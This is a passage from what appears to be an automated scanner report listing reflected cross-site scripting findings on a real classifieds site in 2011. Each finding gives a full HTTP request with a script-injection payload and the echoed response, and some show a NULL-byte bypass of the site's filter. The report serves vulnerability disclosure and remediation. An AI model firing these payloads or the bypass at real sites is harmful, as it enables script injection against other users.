Set-Cookie: classifieds[lastpage][0][name]=Apartments+for+Rent; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment/fair-oaks-apartments-2416171997?218a8"><script>alert(1)</script>ab9259f54a3=1&mobile=1" rel="nofollow">
...[SNIP]...

1.27. http://classifieds.lycos.com/housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17a93"><script>alert(1)</script>09cea7d799e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-apartment17a93"><script>alert(1)</script>09cea7d799e/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:37 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment17a93"><script>alert(1)</script>09cea7d799e/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320?mobile=1" rel="nofollow">
...[SNIP]...

1.28. http://classifieds.lycos.com/housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0066cfc"><script>alert(1)</script>e742502d564 was submitted in the REST URL parameter 2. This input was echoed as 66cfc"><script>alert(1)</script>e742502d564 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320%0066cfc"><script>alert(1)</script>e742502d564 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:24 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320%0066cfc"><script>alert(1)</script>e742502d564?mobile=1" rel="nofollow">
...[SNIP]...

1.29. http://classifieds.lycos.com/housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9acf"><script>alert(1)</script>05ba2e375bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320?e9acf"><script>alert(1)</script>05ba2e375bd=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:06 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=housing%2Frent%2Fapartment; path=/
Set-Cookie: classifieds[lastpage][0][name]=Apartments+for+Rent; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320?e9acf"><script>alert(1)</script>05ba2e375bd=1&mobile=1" rel="nofollow">
...[SNIP]...

1.30. http://classifieds.lycos.com/housing-rent-commercial-office_space/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-commercial-office_space/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f0de"><script>alert(1)</script>e40a3a03cb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-commercial-office_space9f0de"><script>alert(1)</script>e40a3a03cb1/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:11:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:01 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-commercial-office_space9f0de"><script>alert(1)</script>e40a3a03cb1/?mobile=1" rel="nofollow">
...[SNIP]...

1.31. http://classifieds.lycos.com/housing-rent-commercial-office_space/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-commercial-office_space/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5c80"><script>alert(1)</script>36e8e54f4e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-commercial-office_space/?c5c80"><script>alert(1)</script>36e8e54f4e2=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:10:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:10:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-commercial-office_space/?c5c80"><script>alert(1)</script>36e8e54f4e2=1&mobile=1" rel="nofollow">
...[SNIP]...

1.32. http://classifieds.lycos.com/housing-rent-condo/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-condo/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13e8a"><script>alert(1)</script>00ac3d88a6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-condo13e8a"><script>alert(1)</script>00ac3d88a6d/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:08:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:53 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-condo13e8a"><script>alert(1)</script>00ac3d88a6d/?mobile=1" rel="nofollow">
...[SNIP]...

1.33. http://classifieds.lycos.com/housing-rent-condo/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-condo/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1e90"><script>alert(1)</script>362549775a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-condo/?c1e90"><script>alert(1)</script>362549775a0=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:08:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:11 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 55748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-condo/?c1e90"><script>alert(1)</script>362549775a0=1&mobile=1" rel="nofollow">
...[SNIP]...

1.34. http://classifieds.lycos.com/housing-rent-home/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-home/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bfc4"><script>alert(1)</script>7ad962eae44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-home2bfc4"><script>alert(1)</script>7ad962eae44/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:37 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-home2bfc4"><script>alert(1)</script>7ad962eae44/?mobile=1" rel="nofollow">
...[SNIP]...

1.35. http://classifieds.lycos.com/housing-rent-home/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-home/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a8c7"><script>alert(1)</script>4cd20fa0ed6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-home/?8a8c7"><script>alert(1)</script>4cd20fa0ed6=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:48 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-home/?8a8c7"><script>alert(1)</script>4cd20fa0ed6=1&mobile=1" rel="nofollow">
...[SNIP]...

1.36. http://classifieds.lycos.com/housing-rent-home/fishhawk-ranch-2365223841 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-home/fishhawk-ranch-2365223841

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce007"><script>alert(1)</script>b8ae2171e65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-homece007"><script>alert(1)</script>b8ae2171e65/fishhawk-ranch-2365223841 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:52 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-homece007"><script>alert(1)</script>b8ae2171e65/fishhawk-ranch-2365223841?mobile=1" rel="nofollow">
...[SNIP]...

1.37. http://classifieds.lycos.com/housing-rent-home/fishhawk-ranch-2365223841 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-home/fishhawk-ranch-2365223841

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00783cb"><script>alert(1)</script>bb6e81bb1b5 was submitted in the REST URL parameter 2. This input was echoed as 783cb"><script>alert(1)</script>bb6e81bb1b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /housing-rent-home/fishhawk-ranch-2365223841%00783cb"><script>alert(1)</script>bb6e81bb1b5 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:53 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-home/fishhawk-ranch-2365223841%00783cb"><script>alert(1)</script>bb6e81bb1b5?mobile=1" rel="nofollow">
...[SNIP]...

1.38. http://classifieds.lycos.com/housing-rent-home/fishhawk-ranch-2365223841 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-home/fishhawk-ranch-2365223841

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7af7"><script>alert(1)</script>d3741c6c494 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-home/fishhawk-ranch-2365223841?a7af7"><script>alert(1)</script>d3741c6c494=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:29 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=housing%2Frent%2Fhome; path=/
Set-Cookie: classifieds[lastpage][0][name]=Homes+for+Rent; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-home/fishhawk-ranch-2365223841?a7af7"><script>alert(1)</script>d3741c6c494=1&mobile=1" rel="nofollow">
...[SNIP]...

1.39. http://classifieds.lycos.com/housing-rent-roommates/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-roommates/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1cd5"><script>alert(1)</script>12f816493e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-roommatesc1cd5"><script>alert(1)</script>12f816493e0/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:08:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:48 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-roommatesc1cd5"><script>alert(1)</script>12f816493e0/?mobile=1" rel="nofollow">
...[SNIP]...

1.40. http://classifieds.lycos.com/housing-rent-roommates/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-roommates/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4386a"><script>alert(1)</script>53f51d5a76c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-roommates/?4386a"><script>alert(1)</script>53f51d5a76c=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:08:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:09 GMT; path=/
